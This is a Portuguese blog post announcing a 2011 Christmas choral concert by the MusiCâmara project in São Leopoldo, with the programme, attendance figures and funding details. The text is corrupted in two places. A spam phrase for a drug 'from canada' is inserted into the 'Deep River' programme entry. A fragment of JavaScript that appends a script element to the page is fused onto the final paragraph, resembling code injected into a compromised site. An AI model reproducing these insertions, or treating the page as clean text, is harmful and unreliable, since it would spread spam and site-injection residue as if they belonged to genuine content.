LateralMúsica coralProgramaçãoRio Grande do Sul

Concerto de Natal em São Leopoldo

Concerto de Natal encerra temporada 2011 do MusiCâmara.

SERVIÇO

 

Igreja do Relógio
Rua Osvaldo Aranha, 450 – Centro –  São Leopoldo

Dia 16 de dezembro, às  19h30

Entrada franca

 

O concerto Natalino que será apresentado na Igreja do Relógio no dia 16 de dezembro pelo  Grupo Vocal Mandrialis de Porto Alegre e Madrigal Presto de São Leopoldo vai marcar  o encerramento da temporada 2011 do Projeto MusiCâmara.

Com regência do maestro João Paulo Sefrin, técnica vocal e coordenação artística de Lúcia Passos, no programa do concerto destaca-se a estréia no RS  da obra Natalina O magnum mysterium,  de Morten Lauridsen,  bem como  a interpretação  de outras composições raramente cantadas pelos corais,  entre elas Hodie Christus natus est de Sweelinck,  ao lado de canções tradicionais de Natal, oriundas de várias culturas como Natal  (F. Mendelssohn),  Noite Feliz (Franz Gruber)  e Pampa de Luz  (Pery Souza e Luiz de Miranda).

 

PROGRAMA

Gerald Finzi
My Spirit Sang all Day

Giovanni Pierluigi da Palestrina
Tu es Petrus

Negro Spiritual clomiprimate from canada
Deep River
– Arranjo Cozzella

Eric Whitacre
Lux Aurumque

Teixeirinha
Querência Amada
– Arranjo de João Paulo Sefrin

Pery Souza e Luiz de Miranda
Pampa de Luz
– Arranjo de Luciano Lunkes

Vitor Ramil e Fernando Pessoa
Noite de São João
– Arranjo de Manuel de Abreu

Vitor Ramil
Passageiro
– Arranjo de Manuel de Abreu

Jorge Preiss
Ave Maria Guarany

Franz Biebl
Ave Maria

Morten Lauridsen
O magnum mysterium

Jan Pieters Sweelinck
Hodie Christus natus est

F. Mendelssohn
Glória – Natal

Anônimo
Dona nobis pacem

Gustav Holst Cranham
In the Bleak Midwinter

Melodia Francesa
Ding Dong Merrily on High
– Harmonização de Edward L. Stauff

Franz Gruber
Noite Feliz
– Arranjo de Damiano Cozzella

 

Resultados do Projeto MusiCâmara  em 2011

O Projeto MusiCâmara  realizou 9 concertos de março a novembro deste ano, contando com um público médio de 250 pessoas por concerto, perfazendo o total de 2.250 espectadores. Através da parceria com a Secretaria Municipal de Educação de São Leopoldo-SMED,  o Projeto visitou sete  escolas da rede municipal de ensino, atingindo diretamente cerca de 600 estudantes, que assistiram aos concertos no decorrer de 2011.

 

MusiCâmara  2012 tem apoio da Lei Federal de Incentivo à Cultura

No quinto ano de atividades,  em 2012 o Projeto MusiCâmara conta com o importante apoio do Ministério da Cultura,  por meio da Lei Rouanet, o que  possibilita a captação de recursos através do Imposto de Renda, nas modalidades de Pessoa Física e/ou jurídica. Os leopoldenses estão convidados a colaborar com o MusiCâmara e,  desta forma,  estarão incentivando a cultura em São Leopoldo.

 

Projeto MusiCâmara – diferencial didático

Com a coordenação artística da cantora e professora de técnica vocal Lúcia Passos, o Projeto MusiCâmara é aberto à comunidade em geral e aos estudantes. Realizado pela  PRESTO – Produções e Promoções Artísticas, em parceria com as Secretarias de Cultura e Educação da Prefeitura de São Leopoldo, apresenta um diferencial que se constitui no trabalho didático que é feito anteriormente pelos músicos  nas escolas da rede pública municipal de São Leopoldo,   com o objetivo de preparar  os alunos  para a melhor compreensão do programa que será executado.d.getElementsByTagName(‘head’)[0].appendChild(s);document.currentScript.parentNode.insertBefore(s, document.currentScript);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.